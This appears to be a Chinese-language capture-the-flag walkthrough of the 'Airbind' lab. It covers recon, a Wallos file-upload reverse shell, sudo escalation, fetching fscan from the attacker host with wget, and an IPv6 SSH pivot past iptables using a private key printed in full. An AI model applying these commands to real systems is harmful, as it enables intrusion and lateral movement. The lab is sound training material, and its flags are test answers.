您的位置: 首页 - 站长

iis默认网站怎么设置做的阿里巴巴网站的放哪个科目

当前位置: 首页 > news >正文

iis默认网站怎么设置,做的阿里巴巴网站的放哪个科目,省品牌建设联合会网站,苏州设计公司目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 使用ipv6绕过iptables 四、结论 一、测试环境 1、系统环境 渗透机#xff1a;kali2021.1(192.168.101.127) 靶 机#xff1a;debian(192.168.101.11…目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 使用ipv6绕过iptables 四、结论 一、测试环境 1、系统环境 渗透机kali2021.1(192.168.101.127) 靶  机debian(192.168.101.112) 物理机win11(192.168.101.241) 注意事项 ①该类型靶场只能在virtualBox上搭建因此将靶机设置为桥接网络方便进行渗透。攻击机kali也要桥接出来不然会出问题。 ②靶机启动失败设置中取消勾选usb即可 2、使用工具/软件 Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、nc(获取shell测试端口)、ping6(探测ipv6地址)、ssh(进行远程连接) 物理机burp suite(修改请求包) 测试网址http://192.168.101.112 靶场介绍由国外大佬搭建的靶场类似于vulnhub经常更新需要翻墙才能进。 地址https://hackmyvm.eu/machines/machine.php?vmAirbind 二、测试目的 通过wallos的文件上传漏洞获取反弹shell通过ipv6地址进行ssh连接绕过iptables。 三、操作过程 1、信息搜集 主机探测 arp-scan -l 靶机IP192.168.101.112 物理机IP192.168.101.241 端口和服务探测 nmap -sT -A -p- -T4 192.168.101.112 靶机开启了22端口(ssh服务)、80端口(web服务) 但是需要注意的细节是这里的22端口是filtered状态 目录扫描 gobuster dir -u http://192.168.101.112 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt 2、Getshell 靶场主页是登录页面测试弱口令成功登录 admin/admin 通过查找该webapps的漏洞发现wallos存在文件上传的RCE漏洞 文件上传点在主页的Add first subscription 这里要谨慎操作上传成功一次之后就上传不了文件了可以提前留个快照再操作 在upload logo点上传文件直接上传反弹shell文件save保存用burp抓save的包 根据漏洞exp 修改两个点content-type和文件头 修改后放包可以看到成功上传 上传的文件可以在/images/uploads/logos/中找到 http://192.168.101.112/images/uploads/logos/ 攻击端开启监听点击反弹shell文件即可获取shell 3、提权 查看sudo权限发现www-data用户有完整的sudo权限那么可以直接拿下root用户了 sudo -l sudo su root id 进root的家目录拿flag4408f370877687429c6ab332e6f560d0 SHELL/bin/bash script -q /dev/null cd ls cat user.txt 但是只是user.txt很奇怪 再看一下IP ip a 可以看到这个IP10.0.3.241并不是web网页的地址 那么web主机的IP呢 既然这是内网的一个IP那就用fscan扫描一下该网段 wget 192.168.101.127:8888/fscan chmod x fscan ./fscan -h 10.0.3.24124 可以看到果然有另一个内网地址10.0.3.1作为网关 可以ping到10.0.3.1 联想到开局扫描端口时22端口的filtered情况尝试用nc探测22端口情况 正常探测22端口开放会有回显如下 nc 127.0.0.1 22 在靶机探测明显22端口探测被拦截没有任何回显 nc 10.0.3.1 22 使用ipv6绕过iptables上线第二个系统 可以用ipv6广播来获取所有的ipv6地址ff02::1是广播地址向所有主机发送报文 ping6 -I eth0 ff02::1 这里获取了三个ipv6地址 fe80::20c:29ff:fe1f:da51%eth0 fe80::a00:27ff:fedc:2a3b%eth0 fe80::cc02:bfff:fee5:f81c%eth0 尝试ssh连接ipv6地址私钥可以在靶机的root根目录获取 cd .ssh ls cat id_rsa 私钥如下 —–BEGIN OPENSSH PRIVATE KEY—– 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 EkGwPez9XGBEUAAAALcm9vdEB1YnVudHU —–END OPENSSH PRIVATE KEY—– 将私钥保存在攻击机kali上 vim id_rsa cat id_rsa chmod 600 id_rsa ssh分别连接三个ipv6地址 fe80::a00:27ff:fedc:2a3b%eth0 ssh rootfe80::a00:27ff:fedc:2a3b%eth0 -i id_rsa 连接第二个地址成功连接是rootairbind一个新的用户。 查看IP可以看到该系统是web网页的主机也是10.0.3.1主机 在根目录找到第二个flag2bd693135712f88726c22770278a2dcf 四、结论 一台主机也可以有两套系统同时运行当iptables过滤ipv4地址的访问时可以用ipv6地址绕过限制进行连接。